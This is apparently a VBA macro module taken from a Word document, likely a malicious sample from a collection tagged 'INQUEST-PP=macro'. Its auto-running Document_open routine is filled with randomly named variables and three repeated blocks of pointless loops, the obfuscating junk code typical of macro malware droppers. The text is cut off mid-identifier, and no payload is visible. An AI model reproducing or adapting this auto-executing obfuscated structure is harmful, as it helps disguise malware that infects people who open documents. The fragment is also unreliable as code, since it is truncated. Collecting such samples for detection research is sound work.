Attribute VB_Name = "Khgvqxjqnrk"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Rnxdjmwqpuzf, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Pyrgsypsqzy = Uddmionlnkn To 0
      For Mtvxaprr = Dhoydtsepvgut To 0
         Wnlebndor = (23 + Round(WOJOkxR3))
      Next
      Xtzjszfdafuqk = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Gywtszuoebfm = uzH To MZDUoaj1
         Zswngvyfgc = ChrB(dANsZ68a4)
         Next
      For Qadbxblghfs = 0 To 0
         Xdeuhmmtramx = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Gkbjgqtw = Eqxtszzpp To 0
      For Kfbxcxwvhz = Srzgcqgoeuvps To 0
         Dijsvwpwfamdt = (23 + Round(WOJOkxR3))
      Next
      Ljgqfbst = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Jjipkmfzytmxg = uzH To MZDUoaj1
         Cvugqmnr = ChrB(dANsZ68a4)
         Next
      For Mibxxlont = 0 To 0
         Hgvnheudooc = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Yqvqnmangido = Mjlmtiatyi To 0
      For Maxlswclt = Hevjhqwckake To 0
         Tosresmbgzaqu = (23 + Round(WOJOkxR3))
      Next
      Lgpqqdixy = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Cgegcweo = uzH To MZDUoaj1
         Kupegfxvj = ChrB(dANsZ68a4)
         Next
      For Fvztuocukqty = 0 To 0
         Fxzx

INQUEST-PP=macro
